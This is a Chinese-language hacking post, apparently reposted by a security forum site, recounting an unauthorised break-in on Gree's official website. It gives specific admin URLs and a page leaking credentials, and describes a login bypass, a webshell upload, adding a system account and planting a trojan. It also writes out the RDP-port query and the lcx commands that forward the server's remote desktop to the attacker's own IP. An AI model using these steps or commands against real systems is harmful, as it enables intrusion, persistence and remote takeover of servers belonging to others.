友情檢測格力官網

今天在群里無意中看到有人說格力的官方網站是否能日。。

閑著沒事就去看了下格力的網站?后來的結果自然是理想的??

直接上神器?掃后臺敏感目錄先

?

直接爆出后臺地址

http://www.gree.com/admin/config/main.jsp

http://www.gree.com/admin/config

后臺地址兩枚

又看到爆出敏感目錄的后臺帳號密碼信息

http://www.gree.com/admin/db.jsp

用得到的帳號密碼登錄?http://www.gree.com/admin/config/main.jsp

接著打開http://www.gree.com/admin/main.jsp?需要帳密登錄?但是沒有獲取到有效的登錄帳密?然后得以UP大牛的方法提醒利用瀏覽器自身入侵的方法

首先打開用得到的帳號密碼登錄?http://www.gree.com/admin/config/main.jsp?用帳號密碼登錄?然后再打開http://www.gree.com/admin/main.js
p?到后臺登錄界面?因為此后臺禁止鼠標右鍵?所以果斷快捷鍵?Ctrl+F5?刷新后臺?這時你會驚喜的發現?后臺竟然進入了

此后又找到上傳?果斷傳了個shell上去

+——————————————————————————————————————+

By:?冰鋒刺客

傳了個菜刀小馬??^_^

看著有system權限,就直接添加了個賬戶netuser–icesword

加完賬號,發現內網服務器啊,我靠,多麻煩。

不過tasklist看了下進程,www.szcgpp.com 發現也沒殺軟,干脆先種個馬再說。

D:~~~>?start?C:wmpubice.exe

話說我對端口轉發還是比較恐懼的,我的2M寬帶太蛋疼了。其實,我種馬是為了更方便的端口轉發。

接著,看看遠程端口:

D:~~~>?REG?query?HKLMSYSTEMCurrentControlSetControlTerminal”?“ServerWinStationsRDP-Tcp?/v?PortNumber

端口號?—?>???0x19c8??==?6060????(0x1908是6060的十六進制數)


額,現在開始端口轉發:

本機cmd:

#>?C:lcx.exe?-listen?2222?3333

/*注釋:2222?–轉發端口;?3333–連接端口?*/

肉雞服務器cmd:

#>?C:wmpublcx.exe?-slave?110.88.55.78?2222?127.0.0.1?6060

/*注釋:?110.88.55.78是本機IP;6060是服務器遠程桌面端口*/

兩邊的cmd命令行分別敲下Enter鍵,mstsc連接?127.0.0.1:3333。(可以觀察到兩邊的窗口中,持續的在收發數據包)

91ri.org評:提權是典型的內網提權 system權限就很好搞了,其實個人覺得如果沒有想繼續滲透直接種個遠控,還要轉發多麻煩。滲透站點的思路也是比較簡單 大家做一個參考吧。

link:http://hi.baidu.com/new/421717582

補充:文中提到的掃描器名字是:web破殼掃描工具 有興趣的朋友自己百度下載吧 這里不方便提供

網絡安全攻防研究室(www.szcgpp.com)信息安全小組收集整理。